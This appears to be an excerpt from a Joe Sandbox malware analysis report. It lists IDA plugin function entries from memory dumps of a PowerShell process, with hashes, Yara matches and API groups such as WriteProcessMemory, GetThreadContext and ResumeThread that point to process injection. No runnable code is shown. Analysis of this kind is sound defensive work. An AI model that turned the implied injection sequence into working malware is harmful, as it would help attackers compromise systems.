                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $<$ailure #%d - %s$e '
                                                                                        • API String ID: 0-963976815
                                                                                        • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                                        • Instruction ID: efd3525285ac1edc3f1c9fd5283b122e0e9543fa6027cfa0c8ff14496570e496
                                                                                        • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                                        • Instruction Fuzzy Hash: BE92F1B6325A8087DB58CB1DE4A173AB7A1F3C9B84F44512AEB9B87794DE3CC451CB04
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateHeapSection$AllocCloseCurrentErrorLastProcessViewhtonl
                                                                                        • String ID:
                                                                                        • API String ID: 3796667589-0
                                                                                        • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                                                        • Instruction ID: a40a7b366b861d7e36eac45087f3fedf377f71567f01973d5e41ade23fd56e19
                                                                                        • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                                                        • Instruction Fuzzy Hash: 14E19E7A712B00C3FB64CB29ED453EA63A1F767755F0C5125DB9A87A92DA3CE049C301
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: OpenProcess$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3102587992-0
                                                                                        • Opcode ID: bd326562b4ff6c633cb76e410411fd619726b6735ad6ee4be883c68742826dfd
                                                                                        • Instruction ID: ebe658993545c25b0d972be393bdba88cb982cb795eaee100faa27b1b19c5620
                                                                                        • Opcode Fuzzy Hash: bd326562b4ff6c633cb76e410411fd619726b6735ad6ee4be883c68742826dfd
                                                                                        • Instruction Fuzzy Hash: 8531813A712A10DAE760CF29E8447DA37B0F327755F5C0425DD1943A94DB3AC8CACB42
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesocketrecvshutdown
                                                                                        • String ID:
                                                                                        • API String ID: 1995099135-0
                                                                                        • Opcode ID: 331f0389b8b07663a6df5fa77fc594723cc724e5c71f8b940aeecd857598e751
                                                                                        • Instruction ID: d7d2fc07519aace1a73d008f74ae2be86832d8db702edaa520608254613f5b51
                                                                                        • Opcode Fuzzy Hash: 331f0389b8b07663a6df5fa77fc594723cc724e5c71f8b940aeecd857598e751
                                                                                        • Instruction Fuzzy Hash: 50F04938325A50C6E724CB6EBA8576D6250B757FE0F5C0124EEA943F94CB2DC0468741
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                                                                                        • Instruction ID: 177e31c69faa1b324172db12fa0baf39064e7af1f03f0093fc7e4face522460f
                                                                                        • Opcode Fuzzy Hash: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                                                                                        • Instruction Fuzzy Hash: 4D014877624A81CFE720CF24E8493AE33A0F36576EF011909E65946A98CB7CC159CB80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $<
                                                                                        • API String ID: 0-428540627
                                                                                        • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                                        • Instruction ID: c812a09c720e6c2b669cc27623182727a1e5cb713aba74b480310413665698b8
                                                                                        • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                                        • Instruction Fuzzy Hash: E892F1B6325A8087DB58CB1DE4A173AB7A1F3C9B84F44512AEB9B87794CE3CC551CB04
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Duplicate$HandleObject
                                                                                        • String ID:
                                                                                        • API String ID: 2838832959-0
                                                                                        • Opcode ID: 7cb6f6876c3122bade6416d72dbf0b8d0d1f606e86f6ec4eb2d33c2b9b9b6cdd
                                                                                        • Instruction ID: a385a2eec89b2d71593e97754d49b12a66229a9d3f9025f9c2989254b65724d6
                                                                                        • Opcode Fuzzy Hash: 7cb6f6876c3122bade6416d72dbf0b8d0d1f606e86f6ec4eb2d33c2b9b9b6cdd
                                                                                        • Instruction Fuzzy Hash: 4B2183B9316780C6EB60CF1AA44079A77A4F36BBC4F1C4115DE4953BA8CB7DD45ACB01
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$FileMappingSection
                                                                                        • String ID:
                                                                                        • API String ID: 2333316925-0
                                                                                        • Opcode ID: 6e3e0d6d8752c6fcaa429a015979b2c61ad311e0c52e89c0e23b952435a7e56c
                                                                                        • Instruction ID: ce51897d9f01445c4a566ad7bbea79d2b935d014ce88c7aedeb114682bb68dd1
                                                                                        • Opcode Fuzzy Hash: 6e3e0d6d8752c6fcaa429a015979b2c61ad311e0c52e89c0e23b952435a7e56c
                                                                                        • Instruction Fuzzy Hash: 8631533A715B50C6E7A4CF1AE54079A77A1F3ABB80F584115EE4883B94DF3EC849CB41
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: OpenThread
                                                                                        • String ID:
                                                                                        • API String ID: 3092547327-0
                                                                                        • Opcode ID: f6c8be7d9aaf512aa223d62816ea205a430fdf05a21a98b8b4eea950b1956d50
                                                                                        • Instruction ID: e2b2eb7a7a2e5e357b0a978aab77feabb7b04dd107060c31b4aea6ff3a1c8083
                                                                                        • Opcode Fuzzy Hash: f6c8be7d9aaf512aa223d62816ea205a430fdf05a21a98b8b4eea950b1956d50
                                                                                        • Instruction Fuzzy Hash: 43215E3A712A10E6E750CB19A8407D933B4F767795F1C101AED0957AA4CB3AC88ACB02
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MemoryWrite$ProcessVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3286974703-0
                                                                                        • Opcode ID: ac90821cdf529fd4bc9d244ebf53c86ca0a89fa6251bc383fd419e42e6ef3592
                                                                                        • Instruction ID: 4a03dec2d518ab0371588442a329fb0b7b2a8f3e442a0ca84b5b18b75fdc593a
                                                                                        • Opcode Fuzzy Hash: ac90821cdf529fd4bc9d244ebf53c86ca0a89fa6251bc383fd419e42e6ef3592
                                                                                        • Instruction Fuzzy Hash: 66211839706B40C2EB50CB0AB84469A73A4F767BD1F5C5125DE5C437A8DB3DC8698B02
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MemoryRead$ProcessVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 187914430-0
                                                                                        • Opcode ID: f1da16c026c726b767b85992fa2562048d500a6963b4a2322859e3c208df85f4
                                                                                        • Instruction ID: 3ef61f34693601a080b8ff2d38e27d642454571e9087a15c9ef3e88c31e0a188
                                                                                        • Opcode Fuzzy Hash: f1da16c026c726b767b85992fa2562048d500a6963b4a2322859e3c208df85f4
                                                                                        • Instruction Fuzzy Hash: 83210E3A716B80C1EB20CF0AF44469A73A4FB6BBC0F1C4126EA5C47795DB3EC85A8701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentFreeProcessVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2843569277-0
                                                                                        • Opcode ID: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
                                                                                        • Instruction ID: ccdc5476eae4ebeb42efa7ae74ecf12e444f1ae4374016e43cce4a875010552c
                                                                                        • Opcode Fuzzy Hash: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
                                                                                        • Instruction Fuzzy Hash: 3A212C3C706A40D1E760CB09B4503DA73A0B76B7D6F5C2515D94987BA4DB7DC48ACB02
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3262646002-0
                                                                                        • Opcode ID: c310d0f248c33cdb3ebe84675ae115457be158eb74f330db2193df7989e9f360
                                                                                        • Instruction ID: 0456dce2177e47461b44f25b229b2e439d94626dc8c3fb543a8725d0dd93547d
                                                                                        • Opcode Fuzzy Hash: c310d0f248c33cdb3ebe84675ae115457be158eb74f330db2193df7989e9f360
                                                                                        • Instruction Fuzzy Hash: 7901793D307641D7FB54CB5DAD903E926A0A777771F5C46248529826D1CB1E448DC202
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: 9aa08a41824a6887f25afed7e2dec8bb7f87ebe7b081a9c0e8eefdc1c27d7f62
                                                                                        • Instruction ID: 8f834fe19e83f40e0478bb580ab8ca6f1d109c88468cfa9f949afdecd2a1870c
                                                                                        • Opcode Fuzzy Hash: 9aa08a41824a6887f25afed7e2dec8bb7f87ebe7b081a9c0e8eefdc1c27d7f62
                                                                                        • Instruction Fuzzy Hash: BD012C3C306940D1EA64CB5DB9803F923A1A76BB80F5C4025D84997A95DBAFC49AC702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: 32c895d4cf86b11fcd311ac4aa5d99ef6d4ac225d491934d64c2daa716299de9
                                                                                        • Instruction ID: 043f844d62d3bd6e5b5b26e67281667edab8ae3aa6d9a6133c8966d33a345e17
                                                                                        • Opcode Fuzzy Hash: 32c895d4cf86b11fcd311ac4aa5d99ef6d4ac225d491934d64c2daa716299de9
                                                                                        • Instruction Fuzzy Hash: 25014B3C306580D1FAA4CB49B9853ED63A2AB6B7C2F1C6024DD09876D5CB6EC48AC203
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastLogonProcessWith
                                                                                        • String ID:
                                                                                        • API String ID: 2609480667-0
                                                                                        • Opcode ID: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
                                                                                        • Instruction ID: f4ffed19463472986ebadca75ad4da025662d24448462a69faf8603e05c33a23
                                                                                        • Opcode Fuzzy Hash: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
                                                                                        • Instruction Fuzzy Hash: 2001EC79725F08D2E750CB6AE44839D23E0F32ABD1F190125DA6C8B391DB3AC49A8715
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4$H
                                                                                        • API String ID: 0-1439480922
                                                                                        • Opcode ID: 1f1e287907911dbcdd90c2bb2d5c3c463d5ee58522923558e409fc5f14ab3984
                                                                                        • Instruction ID: 0bc33e8a3b912a617cab048fcc346fcb73936c801a7b8ce9946a0c931ca2b6c9
                                                                                        • Opcode Fuzzy Hash: 1f1e287907911dbcdd90c2bb2d5c3c463d5ee58522923558e409fc5f14ab3984
                                                                                        • Instruction Fuzzy Hash: 6291A7D7B0E7C2AAE652866C5CFA0E93B94EF53365B0900B7C694C7093ED1D28079692
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ailure #%d - %s$e '
                                                                                        • API String ID: 0-4163927988
                                                                                        • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                                        • Instruction ID: 3a90b1baacc0b2b20698b18ade122024814562cfb7b2c409dc88d641cea036d2
                                                                                        • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                                        • Instruction Fuzzy Hash: 3E610DB63156508BD714CB0DE49066AB7E2F3CEBD4F88421AE38B87768DA3CD549CB40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4
                                                                                        • API String ID: 0-4088798008
                                                                                        • Opcode ID: 072abd287b21890bc002bfead996fc366d05dc9ebd3de9d5e038414eac6dd96a
                                                                                        • Instruction ID: c7b00f4b4e348d3c9edbef60e79077c90e59e78cbb9f3b2906598e4948eeb608
                                                                                        • Opcode Fuzzy Hash: 072abd287b21890bc002bfead996fc366d05dc9ebd3de9d5e038414eac6dd96a
                                                                                        • Instruction Fuzzy Hash: 2C220572B0DA8A8FEB95DB5CC8A59E97BE0FF56314F14017AC148D7192DE28B842C7C1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: ab61d958565e2a2384a3c637d7c92cb9f10c13c6a5508be91345c4d843d40d10
                                                                                        • Instruction ID: 757321a53041a9f2233b4c3d4b44168b9790eaeb33002e41d1075773747339f8
                                                                                        • Opcode Fuzzy Hash: ab61d958565e2a2384a3c637d7c92cb9f10c13c6a5508be91345c4d843d40d10
                                                                                        • Instruction Fuzzy Hash: C6811F6F71F9C18AF6B1CA1C0A962CC1BD5E777B54F5F508ACB508B2C2E64A484D8313
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
